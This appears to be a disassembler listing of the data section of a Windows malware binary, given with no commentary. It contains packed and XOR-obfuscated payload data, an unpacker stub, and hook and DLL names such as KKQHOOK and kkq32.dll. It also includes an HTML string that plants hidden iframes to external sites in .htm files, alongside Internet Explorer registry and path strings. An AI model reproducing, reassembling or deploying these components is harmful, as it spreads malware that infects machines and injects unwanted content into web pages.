dd 643FB942h, 0BEE8C46Fh, 6F1F5C48h, 0EF43750Fh, 45258CA2h
dd 8BB3A77h, 5B642123h, 0E7DEDFE1h, 53B746CEh, 0F5695F75h
dd 0C26C61D2h, 561F44B7h, 87095D43h, 240056E8h, 0C27A6D84h
dd 7315B6E8h, 9A3611Fh, 337FB004h, 315CD90h, 0C43380A8h
dd 0DF34D034h, 0FFFFD55Bh, 0F34EE34h, 2A351B35h, 0A6353935h
dd 0D735D135h, 32A7E035h, 0FF556FFAh, 8A366B36h, 0A4369B36h
dd 8A371099h, 46381C37h, 0FFFFFF38h, 385F3A17h, 38E238C3h
dd 392838FEh, 39453938h, 3965394Bh, 39D339B6h, 39F939E6h
dd 0FFFFFFFFh, 3A403A39h, 3A4E3A47h, 3A5C3A55h, 3A6A3A63h
dd 3A783A71h, 3A9F3A90h, 3AB13AA8h, 3B083AF4h, 0FFFFFFFFh
dd 3B153B10h, 3B7E3B76h, 3C723C0Ch, 3C9F3C8Ch, 3D313D09h
dd 3DB93DB0h, 3E803E3Ah, 3E9E3E97h, 0FFFFAF8Bh, 3F043EBEh
dd 3F4C3F35h, 3F6E3F62h, 3FF03F7Dh, 7B1084F9h, 66FFFFF2h
dd 53020C0h, 2A311131h, 6C313931h, 89317831h, 0C319831h
dd 0FFC00232h, 2B3323FFh, 0C2334433h, 0B33E333h, 18341334h
dd 0FF8F2934h, 58FFFFDDh, 0F334C134h, 2134FB34h, 2E352935h
dd 89358135h, 0F335E5CBh, 1635FD35h, 7F462336h, 3036FFF7h
dd 41363936h, 7C365836h, 0BADB8236h, 4E36DD36h, 0FF0E5338h
dd 38FFFFFFh, 3890387Dh, 393E38B1h, 3A1739B1h, 3A5E3A22h
dd 3AC63A68h, 3B1D3AE8h, 3B7C3B28h, 0BFB73B85h, 3BFEFFFBh
dd 3C683C07h, 3C763C70h, 0B9883C80h, 3D503CE7h, 2E343D5Dh
dd 0FFFE453Eh, 4A3EFFFFh, 573E503Eh, 783E6E3Eh, 0DE3ECD3Eh
dd 6C3F613Eh, 933F853Fh, 0CA3FBF3Fh, 0E93FDB3Fh, 0EFFFFF3Fh
dd 0BFF4E81Eh, 3089304Ch, 30DE30D9h, 30FD30F6h, 3141313Ah
dd 3164315Bh, 0FFF42F10h, 319F3194h, 31AD31A8h, 31F831F2h
dd 1632353Fh, 1ADFFE1Bh, 34AAC39Eh, 34CB34BAh, 350834D7h
dd 356E8D20h, 0FE003780h, 35A03586h, 277835A5h, 763748h
dd 0F0DEDF0h, 0A72C380Eh, 68385038h, 0BFFFB7FFh, 1438CB51h
dd 20391939h, 2C392639h, 393439h, 39763961h, 398D3985h
dd 1B399Fh, 39A7EE0Bh, 0D099CBACh, 0FE00ED17h, 0F539FD5Bh
dd 0FF39FA39h, 3A103A4Bh, 3A1E3A18h, 0FFFFFF74h, 3AB31937h
dd 3B733B42h, 3BA83B81h, 3BB43BAEh, 3BC03BBAh, 3BCC3BC6h
dd 3BD83BD2h, 0FFFD2FFFh, 3BE43BDEh, 3BF03BEAh, 3DEE3DA2h
dd 0FA03DF3h, 213E143Eh, 353E303Eh, 0C006423Eh, 513EFFFFh
dd 603E563Eh, 813E723Eh, 903E893Eh, 473F3D3Eh, 1BFC02Bh
dd 913F83F0h, 0BC3FA629h, 0D53FC43Fh, 6DB19FFh, 30F3F32Dh
dd 1A3015DFh, 24301F30h, 0EDB7F824h, 302930h, 3F30F535h
dd 6A306530h, 0C7E61F30h, 424E009Eh, 19974931h, 0FA064060h
dd 458D01A2h, 73F84473h, 2EC49FEh, 0FB6B7068h, 302E3220h
dd 268B4B5Ch, 5C17809Eh, 0F4F05C77h, 55050120h, 0B1626470h
dd 0A70495C4h, 0FE77AA4Eh, 5A6AD43Bh, 536B4209h, 74726174h
dd 6F9C0530h, 756F7247h, 780AD670h, 1FAC0A41h, 740582C1h
dd 7618D734h, 76435016h, 6E73D55Ch, 0D01205Bh, 709FD700h
dd 7EDE01EDh, 0BA1D6F97h, 8F61D00h, 155C903Eh, 323C575Dh
dd 6604640h, 4523FB59h, 80082A1Fh, 0FF85F633h, 7F18177Eh
dd 5C661519h, 3B461E28h, 0A4237CF7h, 80E9F30Ah, 0FEE03B24h
dd 1CF24362h, 18004010h, 54680C13h, 0C9BE6176h, 111473C6h
dd 48100E6Ah, 0E054813Eh, 401028h, 0EE74C2A9h, 4C1B1448h
dd 0A306E7E0h, 54C65660h, 36A3090Fh, 49105AF7h, 40042005h
dd 64059C4Fh, 593167FBh, 64BD2034h, 0F6C94C9Ch, 9C9CBE57h
dd 0CF25C6A4h, 68C0A481h, 799FF7D0h, 681600D8h, 6ABB683Ah
dd 2394BE0Ah, 7FDDF348h, 0AC7D8D59h, 0BEA4A5F3h, 7D8D0B84h
dd 7CA5A5D8h, 0C11BB19Eh, 74BEF5F0h, 0B76CE80Ah, 0F84776EBh
dd 6468E4A5h, 0ACE6A40Bh, 205D99BEh, 2480553Eh, 6A7BC169h
dd 7457B001h, 6A0F14ECh, 350F3519h, 0F89B09E2h, 4CC4831Fh
dd 0CD9261C9h, 0DF08E19Ch, 37F56AF8h, 44A66CD4h, 0D4A94005h
dd 73850F80h, 0BE9DF761h, 6604EFBCh, 0FF0096F2h, 420EF7BAh
dd 358B0C64h, 0F4FE14ECh, 46306767h, 19031AD6h, 0BF784783h
dd 5204C2EEh, 842A3C30h, 10E1105h, 0D98B6159h, 68591E67h
dd 2A2039ECh, 0C8680134h, 10FF00F3h, 1A7CAD72h, 385A13DEh
dd 640AEA60h, 349F74C3h, 0D40476E0h, 112E30AFh, 7B2CEFEFh
dd 0D68D8D04h, 98D0FF68h, 0BF0A5628h, 204D1DEFh, 5FBB6C51h
dd 8B5900B5h, 3635C096h, 76A7962Ah, 50DD1448h, 4B65709h
dd 8DEA2D1Eh, 0FF33027Dh, 20F9080Eh, 0B023B454h, 1D24575Dh
dd 735957B0h, 0CC510205h, 60160000h, 1B70A028h, 19C4110h
dd 18013C61h, 5C21C406h, 31004401h, 0BA4280C0h, 9384BA0Ah
dd 0F9773Eh, 20303104h, 8824A692h, 1555790h, 20318804h
dd 0E292010Bh, 10E2090h, 65601D4h, 4C04B2C4h, 0E6062090h
dd 0F1256D3Eh, 88441212h, 0D8304116h, 7DE3D25Ch, 460AB27Bh
dd 0B6674456h, 85105580h, 43EC8A36h, 315C69C4h, 20067301h
dd 0C54165Fh, 20F20001h, 0F79E12Fh, 0D5656E01h, 22A0B078h
dd 0CE280C1h, 8DF50581h, 840C021Fh, 744EE054h, 57AC837Ah
dd 68170419h, 50599604h, 906CB05Fh, 510C02EBh, 0FD48206Ch
dd 7B2Ch, 71BFBC00h, 12000000h, 0FF0000h, 6000BE60h, 0BE8D0040h
dd 0FFFFB000h, 0FFCD8357h, 909010EBh, 90909090h, 8846068Ah
dd 0DB014707h, 1E8B0775h, 11FCEE83h, 0B8ED72DBh, 1, 775DB01h
dd 0EE831E8Bh, 11DB11FCh, 73DB01C0h, 8B0975EFh, 0FCEE831Eh
dd 0E473DB11h, 0E883C931h, 0C10D7203h, 68A08E0h, 0FFF08346h
dd 0C5897474h, 775DB01h, 0EE831E8Bh, 11DB11FCh, 75DB01C9h
dd 831E8B07h, 0DB11FCEEh, 2075C911h, 75DB0141h, 831E8B07h
dd 0DB11FCEEh, 0DB01C911h, 975EF73h, 0EE831E8Bh, 73DB11FCh
dd 2C183E4h, 0F300FD81h, 0D183FFFFh, 2F148D01h, 76FCFD83h
dd 42028A0Fh, 49470788h, 63E9F775h, 90FFFFFFh, 0C283028Bh
dd 83078904h, 0E98304C7h, 1F17704h, 0FF4CE9CFh, 895EFFFFh
dd 11AB9F7h, 78A0000h, 3CE82C47h, 80F77701h, 0F275043Fh
dd 5F8A078Bh, 0E8C16604h, 10C0C108h, 0F829C486h, 1E8EB80h
dd 830789F0h, 0D88905C7h, 0BE8DD9E2h, 7000h, 0C009078Bh
dd 5F8B3C74h, 30848D04h, 9000h, 8350F301h, 96FF08C7h, 9050h
dd 47078A95h, 0DC74C008h, 4857F989h, 0FF55AEF2h, 905496h
dd 74C00900h, 83038907h, 0E1EB04C3h, 905896FFh, 0E9610000h
dd 0FFFFDF61h, 26h dup(0)
dd 0A070h, 0A050h, 3 dup(0)
dd 0A07Dh, 0A060h, 3 dup(0)
dd 0A08Ah, 0A068h, 5 dup(0)
dd 0A094h, 0A0A2h, 0A0B2h, 0
dd 0A0C0h, 0
dd 0A0CEh, 0
aKernel32_dll_1 db 'KERNEL32.DLL',0
aAdvapi32_dll_0 db 'ADVAPI32.dll',0
aMsvcrt_dll db 'MSVCRT.dll',0
align 2
aLoadlibrarya db 'LoadLibraryA',0
align 10h
aGetprocaddress db 'GetProcAddress',0
align 10h
aExitprocess db 'ExitProcess',0
dd 65520000h, 6F6C4367h, 654B6573h, 79h, 646E6172h, 4Ch dup(0)
dd 3, 0Eh
dword_445448 dd 40h ; sub_4083E5:loc_408413�r ...
aMvwp db 'Mwp',0 ; DATA XREF: sub_40847D+1E�o
aCBoot_sys db 'c:\boot.sys',0 ; DATA XREF: sub_4085D0+37�o
word_44545D dw 20h ; DATA XREF: sub_4085D0+44�r
byte_44545F db 0 ; DATA XREF: sub_4085D0+BA�o
dword_445460 dd 582049h dword_445464 dd 11h, 0Fh dup(0)dword_4454A4 dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_4088A5+D�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh, 2, 12h
dword_4454EC dd 0 ; .text:loc_40875B�r ...
word_4454F0 dw 46h ; DATA XREF: sub_4087F1+4�r
align 4
dword_4454F4 dd 2 dd 12h
dword_4454FC dd 0 ; .text:loc_40883D�r ...
word_445500 dw 46h ; DATA XREF: sub_4088D5+C�r
word_445502 dw 7630h ; DATA XREF: sub_4088D5+19�o
db 0
byte_445505 db 20h, 2Ch, 0 ; DATA XREF: sub_4088D5+29�o
dword_445508 dd 5E233Bh dd 2, 0Bh
dword_445514 dd 0 ; .text:loc_408A35�r ...
dword_445518 dd 0FFFFFFFFh dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
aJwouJ? db 'jWOu J?',0 ; DATA XREF: sub_408A95+65�o
dword_445920 dd 403B20h off_445924 dd offset loc_408B25 ; DATA XREF: sub_408A95+81�r
dd offset loc_408B32
dd offset loc_408B69
dd offset loc_408B92
aHtmlIframeSrcH db '<html><iframe src=http://kavkazcenter.com/russ/></iframe><iframe '
; DATA XREF: sub_408BE4+8B�o
; sub_408BE4+A7�o
db 'src=http://kavkazcenter.net/russ/></iframe><iframe src=http://kav'
db 'kazchat.com></iframe><iframe src=http://chechenpress.info></ifram'
db 'e><iframe src=http://chechenpress.co.uk></iframe><iframe src=http'
db '://shaheeds.org></iframe><iframe src=http://daymohk.info></iframe'
db '><iframe src=http://chripress.org></iframe><iframe src=http://mar'
db 'sho.dk></iframe>',0
dword_445ACB dd 4C262Dh dword_445ACF dd 7E3139h aXola db 'xOLa%',0 ; DATA XREF: sub_408E89+2D7�o
a6s7P db '6S7+P',0 ; DATA XREF: sub_408E89+2EB�o
aAYI db 'A&y I',0 ; DATA XREF: sub_408E89+607�o
word_445AE5 dw 55h ; DATA XREF: sub_408E89+7EF�r
aDvybtb db ' dyTB',0 ; DATA XREF: sub_408E89+847�o
byte_445AEF db 58h ; DATA XREF: sub_408E89+889�o
dd 832D7F20h
db 36h, 69h, 0
word_445AF7 dw 63h ; DATA XREF: sub_408E89+9AC�r
byte_445AF9 db 25h, 55h, 0 ; DATA XREF: sub_409847+16�o
word_445AFC dw 24h ; DATA XREF: sub_409847+23�r
aXeXw7 db 'xe#xW7',0 ; DATA XREF: sub_409847+36�o
aSZtw db 's* ztw',0 ; DATA XREF: sub_409847+49�o
word_445B0C dw 4Ah ; DATA XREF: sub_409847+56�r
dword_445B0E dd 304D2Eh aMc_o9 db ' MC_O9',0 ; DATA XREF: sub_409847+9D�o
aV?zP db 'v?Z,P',0 ; DATA XREF: sub_409847+12A�o
a9yb db '9y|',27h,'&',0 ; DATA XREF: sub_409847+227�o
aRlJ db 'Rl J',0 ; DATA XREF: sub_409847+23A�o
aMe0AP db 'Me0/&P',0 ; DATA XREF: sub_409847+291�o
a@_aP1 db ' @_a&P1',0 ; DATA XREF: sub_409847+2DF�o
aLLe db 'L LE',0 ; DATA XREF: sub_409847+3D4�o
a8bd3 db '*8bd3',0 ; DATA XREF: sub_409847+3EE�o
word_445B46 dw 70h ; DATA XREF: sub_409847+414�r
aWxQ db 'WX$Q',0 ; DATA XREF: sub_409847+442�o
aYxC db 'yX>c ,',0 ; DATA XREF: sub_409847+50E�o
aDdjrm db '!ddJrm*',0 ; DATA XREF: sub_409847+544�o
aPYN db ' P',27h,'y&n',0 ; DATA XREF: sub_409847+681�o
byte_445B63 db 0 ; DATA XREF: sub_409847+6C0�o
a7Emen db '7 EmEn;',0 ; DATA XREF: sub_409847+742�o
aSx db 'sx',0 ; DATA XREF: sub_409847+7F3�o
dword_445B6F dd 7E673Eh dword_445B73 dd 5E3048h word_445B77 dw 40h ; DATA XREF: sub_409847+AFA�r
byte_445B79 db 6Eh, 4Ah, 0 ; DATA XREF: sub_409847+B2D�o
byte_445B7C db 73h, 21h, 0 ; DATA XREF: sub_409847+BE7�o
byte_445B7F db 25h ; DATA XREF: sub_409847+E84�o
dd 497F257Ah
db 0
word_445B85 dw 31h ; DATA XREF: sub_40A704+7�r
word_445B87 dw 72h ; DATA XREF: sub_40A704+55�r
aQk db 'qk ',0 ; DATA XREF: sub_40A766+21�o
byte_445B8E db 0 ; DATA XREF: sub_40A766+B8�o
dword_445B8F dd 372A61h a3hay db '3hAy',0 ; DATA XREF: sub_40A766+154�o
a8bTfa db '<8B=tf',0 ; DATA XREF: sub_40A766+1FC�o
a_rVnx db '_r&nx',0 ; DATA XREF: sub_40A766+20A�o
dword_445BA7 dd 31502Eh dword_445BAB dd 685E59h byte_445BAF db 42h ; DATA XREF: sub_40A766+557�o
db 3Dh, 0
aVcxs db '|vCXS',0 ; DATA XREF: sub_40A766+59A�o
aWBqy db ' w bqy ',0 ; DATA XREF: sub_40A766+5E3�o
byte_445BC0 db 0 ; DATA XREF: sub_40A766+610�o
aWAs@ db 'W!aS@',0 ; DATA XREF: sub_40A766+67C�o
aLKVm db 'l:K VM~',0 ; DATA XREF: sub_40A766+690�o
aScG db 'Sc g',0 ; DATA XREF: sub_40A766+6F8�o
a3sd_ db '3Sd_',0 ; DATA XREF: sub_40A766+75A�o
aKT db '^+k!~T',0 ; DATA XREF: sub_40A766+827�o
dword_445BE0 dd 5E466Bh a9O1 db ' 9',27h,'O1',0 ; DATA XREF: sub_40B143+60�o
byte_445BEA db 0 ; DATA XREF: sub_40B143+74�o
aEv db 'ev# ',0 ; DATA XREF: sub_40B143+1CA�o
word_445BF0 dw 38h ; DATA XREF: sub_40B143+258�r
aV880k db '8+8 0k',0 ; DATA XREF: sub_40B143+33D�o
aA?5m db 'A?5m',0 ; DATA XREF: sub_40B143+383�o
word_445BFF dw 27h ; DATA XREF: sub_40B143+667�r
aShzq db 'ShzQ',0 ; DATA XREF: sub_40B143+780�o
align 4
aN_1 db '',0 ; DATA XREF: sub_40B143+810�o
aAz db '',0 ; DATA XREF: sub_40B143+70A�o
byte_445C0D db 0F8h, 0C3h, 0CCh ; DATA XREF: sub_40B143+639�o
aNN db 'ȍ',0
byte_445C21 db 0F8h, 0C3h, 0CCh ; DATA XREF: sub_40B143+627�o
dd 8DC8C1CFh, 0CC8DC2D9h, 0C2C5D9D8h, 0C8D7C4DFh, 0E48D808Dh
dd 0FFE2EEE3h, 0F9EEE8FFh, 0E3E4FD8Dh, 0C1FD8D83h, 0C8DECCC8h
dd 0C2CE8D81h, 0CEC8DFDFh
db 0D9h, 83h, 0
aIAi db 'ހ',0 ; DATA XREF: sub_40B143+487�o
byte_445C5D db 0FDh, 0C1h, 0C8h ; DATA XREF: sub_40B143+42F�o
dd 81C8DECCh, 0C1C8DE8Dh, 8DD9CEC8h, 0C4DDD5E8h, 0C4D9CCDFh
dd 0F48DC3C2h, 0DFCCC8h
aINi db 'ލ',0 ; DATA XREF: sub_40B143+3D0�o
; sub_40B143+67B�o
word_445C82 dw 0C1FDh ; DATA XREF: sub_40B143+3A0�o
aBnNsNr db 'ȁٍÍ',0
aI db '',0 ; DATA XREF: sub_40B143+347�o
byte_445CA5 db 0EEh, 0E1h, 0FEh ; DATA XREF: sub_40A766+769�o
dd 88F1E9E4h, 0C3E4F1DEh, 0CEC2DFFDh, 0DBDFC8FEh, 9F9EDFC8h
db 0
byte_445CBD db 0FBh, 0 ; DATA XREF: sub_40A766+73D�o
byte_445CBF db 0E6h ; DATA XREF: sub_40A766+707�o
db 0
byte_445CC1 db 0FEh, 0C2h, 0CBh ; DATA XREF: sub_40A766+6C1�o
dd 0DFCCDAD9h, 0C4E0F1C8h, 0DEC2DFCEh, 0F1D9CBC2h, 0C9C3C4FAh
dd 0F1DEDAC2h, 0DFDFD8EEh, 0FBD9C3C8h, 0C4DEDFC8h, 0FEF1C3C2h
dd 0C1C1C8C5h, 0DBDFC8FEh, 0E2C8CEC4h, 0CEC8C7CFh, 0C1C8E9D9h
dd 0C2E1D4CCh
db 0CCh, 0C9h, 0
byte_445D07 db 0FFh ; DATA XREF: sub_40A766+57A�o
dd 0DEC4CAC8h, 0FEDFC8D9h, 0C4DBDFC8h
dword_445D14 dd 0DFFDC8CEh, 0DEC8CEC2h db 0DEh, 0
aUqg db '',0 ; DATA XREF: sub_40A766+566�o
byte_445D2B db 0F1h ; DATA XREF: sub_40A766+425�o
aG db 'ك',0
aDatkkq32_dll db 'datkkq32.dll',0 ; DATA XREF: sub_40A766+3E6�o
aDnkkq_dll db 'dnkkq.dll',0 ; DATA XREF: sub_40A766+3B1�o
aKkq32_dll db 'kkq32.dll',0 ; DATA XREF: sub_40A766+37C�o
word_445D56 dw 0DE88h ; DATA XREF: sub_40A766+372�o
; sub_40A766+3A7�o ...
dd 0DE88F1h
dword_445D5C dd 88F1DE88h, 0D5C883DEh db 0C8h, 0
asc_445D66 db '',0 ; DATA XREF: sub_40A766+C5�o
dword_445D70 dd 0C4DFC9F1h, 0DEDFC8DBh, 0C4C9C3F1h, 83C9DFDEh, 0DED4DEh
; DATA XREF: sub_40A766+5B�o
dbl_445D84 dq 1.2 ; DATA XREF: sub_409847+D82�r
asc_445D8C db '',0 ; DATA XREF: sub_409847+CE4�o
aQ db 'ɟ',0 ; DATA XREF: sub_409847+C6B�o
aN_0 db 'ɍ',0 ; DATA XREF: sub_409847+BAE�o
aCiaq db '',0 ; DATA XREF: sub_409847+A0C�o
aTRq db 'ݐ',0 ; DATA XREF: sub_409847+912�o
word_445DAA dw 0DE88h ; DATA XREF: sub_409847+769�o
dd 83DE88F1h, 0DDC0D9h
aN db 'ٍ',0 ; DATA XREF: sub_409847+4D1�o
asc_445DBA db '',0 ; DATA XREF: sub_409847+29B�o
; sub_409847+5B2�o ...
aTRi db 'ΐ',0 ; DATA XREF: sub_409847+249�o
asc_445DC4 db '',0 ; DATA XREF: sub_409847+1F0�o
; sub_409847+31E�o
dword_445DC8 dd 0D9CBC2FEh, 0C8DFCCDAh, 0CEC4E0F1h, 0C2DEC2DFh, 0FAF1D9CBh
; DATA XREF: sub_409847+1DE�o
; sub_409847+30C�o
dd 0C2C9C3C4h
db 0DAh, 0DEh, 0
aVG db 'ƃ',0 ; DATA XREF: sub_409847+19A�o
aV db '',0 ; DATA XREF: sub_409847+165�o
aCvvi db 'ݗ',0 ; DATA XREF: sub_409847+13A�o
word_445DFA dw 0DE88h ; DATA XREF: sub_409847+D6�o
; sub_409847+C19�o
dd 83DE88F1h, 0D9CCC9h
dword_445E04 dd 0CEC4C1EEh, 0C3E28DC6h, 0F98DC8CEh, 0C2EE8DC2h, 0C3C4D9C3h
; DATA XREF: sub_408E89+742�o
db 0D8h, 0C8h, 0
byte_445E1B db 0EFh ; DATA XREF: sub_408E89+730�o
dd 0E2F9F9F8h
db 0E3h, 0
word_445E22 dw 0E9E8h ; DATA XREF: sub_408E89+661�o
; sub_408E89+6B9�o
db 0E4h, 0F9h, 0
byte_445E27 db 0FDh ; DATA XREF: sub_408E89+59B�o
aNNNNNG db 'ȍȍލɍԍÃ',0
word_445E4E dw 0C3F8h ; DATA XREF: sub_408E89+521�o
dd 0C8C1CFCCh, 8DC2D98Dh, 0C5D9D8CCh, 0D7C4DFC2h, 0EC8D83C8h
dd 0FD8DE0F9h, 0EE80E3E4h, 8DC8C9C2h, 0DF8DDEC4h, 0C4D8DCC8h
dd 8DC9C8DFh, 0CE8DC2D9h, 0C1DDC0C2h, 8DC8D9C8h, 8DC8C5D9h
dd 0C3CCDFD9h, 0D9CECCDEh, 83C3C2C4h
db 0
byte_445E99 db 0ECh, 0F9h, 0E0h ; DATA XREF: sub_408E89+4AC�o
dd 0E3E4FD8Dh, 0C9C2EE80h
db 0C8h, 0
aSN db 'Í',0 ; DATA XREF: sub_408E89+437�o
word_445EB6 dw 0C2F4h ; DATA XREF: sub_408E89+3B1�o
aNN_0 db 'ߍɍ',0
aQaigq db '',0 ; DATA XREF: sub_408E89+332�o
aIgq db '',0 ; DATA XREF: sub_408E89+2FB�o
byte_445ED3 db 0EEh ; DATA XREF: sub_408E89+1FA�o
; sub_408E89+25D�o
dd 0E2EFE0E2h, 0F5E2EFh
aZnnnNiG db 'ÍɃ',0 ; DATA XREF: sub_408E89+CF�o
word_445EF6 dw 0F9FEh ; DATA XREF: sub_408E89+BD�o
; sub_408E89+137�o ...
dd 0EEE4F9ECh
db 0
aKkqhook db 'KKQHOOK',0 ; DATA XREF: sub_408E89+A2�o
; sub_409847+2B1�o ...
align 2
aS db '',0 ; DATA XREF: sub_408E89+35�o
; sub_40B143+C6�o
aST db '',0 ; DATA XREF: sub_408E89+19�o
; sub_40B143+A8�o
aIexplore_exe db '\Iexplore.exe ',0 ; DATA XREF: sub_408BE4+119�o
aPath db 'Path',0 ; DATA XREF: sub_408BE4+D7�o
aSoftwareMicros db 'Software\Microsoft\IE Setup\Setup',0 ; DATA XREF: sub_408BE4+DC�o
a_htm db '.htm',0 ; DATA XREF: sub_408BE4+42�o
dword_445F54 dd 0ACA5AB94h, 0ADB0ADE6h, 0E88BE7E8h, 0BAA9BCBBh, 0F2ABE8BCh
; DATA XREF: sub_4085D0+108�o
dd 0A7A7AA94h, 0B1BBE6BCh
db 0BBh, 0
aAFlemcBo db '渡',0 ; DATA XREF: sub_4085D0+E3�o
byte_445F7D db 94h, 0A3h, 0ADh ; DATA XREF: sub_40847D+7A�o
dd 0A4ADA6BAh, 0ACE6FAFBh
db 2 dup(0A4h), 0
byte_445F8B db 4 ; DATA XREF: sub_408189+21A�o
db 3, 0
aKvvkbiMiMqi db 'ÊÌ',0 ; DATA XREF: sub_406E2B+EE0�o
aKvvkbi db 'Ê',0 ; DATA XREF: sub_406E2B+EB3�o
asc_445FA6 db '',0 ; DATA XREF: sub_406E2B+E42�o
asc_445FA8 db '',0 ; DATA XREF: sub_406E2B+DD7�o
asc_445FAA db 'ȵ',0 ; DATA XREF: sub_406E2B+D65�o
aS_0 db '',0 ; DATA XREF: sub_406E2B+6FC�o
aLMaiLvA db 'ѫȵȵ',0 ; DATA XREF: sub_406E2B+625�o
aAmdgKLvA db 'Ѡȵ',0 ; DATA XREF: sub_406E2B+5E1�o
align 4
aName: ; DATA XREF: sub_406E2B+30�o
unicode 0, <name>,0
align 4
aValue: ; DATA XREF: sub_406E2B+15�o
unicode 0, <value>,0
aZgiEEmGdPDpPJe db 'ꃤꏲ',0 ; DATA XREF: sub_406A9A+C6�o
a9ba05972F6a811: ; DATA XREF: sub_4069E2+30�o
unicode 0, <{9BA05972-F6A8-11CF-A442-00A0C90A8F39}>,0
aHtml db '<HTML><!--',0 ; DATA XREF: sub_4062CD+4A2�o
; sub_4062CD+4AD�o ...
aXOkrecv11 db 'X-okRecv11',0 ; DATA XREF: sub_4062CD+3DE�o
aEijMai db 'eij^MAI',0 ; DATA XREF: sub_4062CD+33E�o
dword_446078 dd 59095F09h, 610C010Ch, 435E4F45h, 584A435Fh, 5842650Ch
; DATA XREF: sub_4062CD+2F5�o
dd 49425E49h, 54690C58h, 5E43405Ch
db 49h, 5Eh, 0
byte_44609B db 70h ; DATA XREF: sub_4062CD+1EC�o
dd 5C544965h, 495E4340h, 49544902h
db 0Ch, 0
aMxd db '|MXD',0 ; DATA XREF: sub_4062CD+A7�o
byte_4460AF db 7Fh ; DATA XREF: sub_4062CD+95�o
dd 5B584A43h, 70495E4Dh, 5E4F4561h, 4A435F43h, 69657058h
dd 58497F0Ch, 7F705C59h, 5C595849h
db 0
byte_4460D1 db 6Dh, 2 dup(5Ch) ; DATA XREF: sub_405F79+32A�o
dd 42495A69h, 7F705F58h, 4149444Fh, 6D705F49h, 705F5C5Ch
dd 405C5469h, 5E495E43h, 584F6D70h, 584D5A45h, 684B4245h
dd 41594F43h, 70584249h, 5E596F02h, 5842495Eh
db 0
byte_44610D db 6Dh, 2 dup(5Ch) ; DATA XREF: sub_405F79+2EB�o
dd 42495A69h, 7F705F58h, 4149444Fh, 6D705F49h, 705F5C5Ch
dd 405C5469h, 5E495E43h, 5A4D6270h, 584D4B45h, 704B4245h
dd 5E596F02h, 5842495Eh
db 0
aK@cnm@y_iCjj@e db 'k@CNM@y_I^cJJ@EBI',0 ; DATA XREF: sub_405F79+2BD�o
byte_446153 db 7Fh ; DATA XREF: sub_405F79+2AB�o
dd 5B584A43h, 70495E4Dh, 5E4F4561h, 4A435F43h, 457B7058h
dd 5B434842h, 596F705Fh, 42495E5Eh, 5E497A58h, 4243455Fh
dd 58426570h, 49425E49h, 497F0C58h, 42455858h
db 4Bh, 5Fh, 0
byte_44618F db 45h ; DATA XREF: sub_405F79+265�o
dd 405C5449h, 2495E43h, 495449h
dword_44619C dd 7F705F09h, 5B584A43h, 70495E4Dh, 5E4F4561h, 4A435F43h
; DATA XREF: sub_405F79+224�o
dd 42657058h, 425E4958h, 690C5849h, 43405C54h, 705E495Eh
dd 42454D61h, 4D496A70h, 495E5958h, 5842436Fh, 7040435Eh
dd 786D696Ah, 73697E79h, 6D6F6360h, 6F6D6160h, 69626564h
dd 6F636073h, 7B636867h
db 62h, 0
word_4461F6 dw 4955h ; DATA XREF: sub_405F79+1C0�o
db 5Fh, 0
aNC_ibiCoi__ db 'n^C[_IbI[|^COI__',0 ; DATA XREF: sub_405F79+1AE�o
byte_44620B db 2 ; DATA XREF: sub_405F79+19C�o
db 68h ; h
db 69h, 6Ah, 6Dh
db 79h ; y
db 60h, 78h, 70h
db 7Fh ;
aCjxMIpaeoC_cjx db 'cjx{m~ipaEO^C_CJXp{EBHC[_poY^^IBXzI^_ECBpiT\@C^I^pn^C[_IbI[|^COI_'
db '_',0
dword_446258 dd 786A637Fh, 697E6D7Bh, 40437C70h, 49454F45h, 4561705Fh
; DATA XREF: sub_405F79+E4�o
dd 5F435E4Fh, 70584A43h, 4842457Bh, 705F5B43h, 5E5E596Fh
dd 7A584249h, 455F5E49h, 65704243h, 5E495842h, 0C584942h
dd 5858497Fh, 5F4B4245h, 42437670h, 9705F49h
db 59h, 0
word_4462A6 dw 1A1Dh ; DATA XREF: sub_405F79+7D�o
; sub_405F79+B6�o ...
db 1Ch, 1Dh, 0
byte_4462AB db 7Fh ; DATA XREF: sub_405F79+5C�o
dd 7B786A63h, 70697E6Dh, 5E4F4561h, 4A435F43h, 457B7058h
dd 5B434842h, 596F705Fh, 42495E5Eh, 5E497A58h, 4243455Fh
dd 58426570h, 49425E49h, 497F0C58h, 42455858h, 76705F4Bh
dd 5F494243h, 590970h
dword_4462F0 dd 58440310h, 124041hdword_4462F8 dd 434E0310h, 125548hdword_446300 dd 4F5F0310h, 585C455Eh db 12h, 0
word_44630A dw 495Fh ; DATA XREF: sub_405601+81A�o
dd 41457858h, 58594349h, 5F090E04h, 0E0504h, 17055909h
db 0
byte_446321 db 51h, 0 ; DATA XREF: sub_405601+7F1�o
byte_446323 db 48h ; DATA XREF: sub_405601+7A5�o
dd 41594F43h, 2584249h, 5F025F09h, 45414E59h, 17050458h
db 0
byte_446339 db 4Ah, 59h, 42h ; DATA XREF: sub_405601+749�o
dd 4345584Fh, 5F090C42h, 570504h
dword_446348 dd 2094F09h db 1Eh, 59h, 0
byte_44634F db 10h ; DATA XREF: sub_405601+6CA�o
dd 455E4F5Fh, 12585Ch
dword_446358 dd 434A0310h, 12415Ehdword_446360 dd 5C424510h, 580C5859h, 11495C55h, 4E595F0Eh, 0E584541h
; DATA XREF: sub_405601+682�o
dd 404D5A0Ch, 0B114959h
db 0Bh, 12h, 0
byte_44637F db 9 ; DATA XREF: sub_405601+57B�o
db 5Fh, 50h, 0
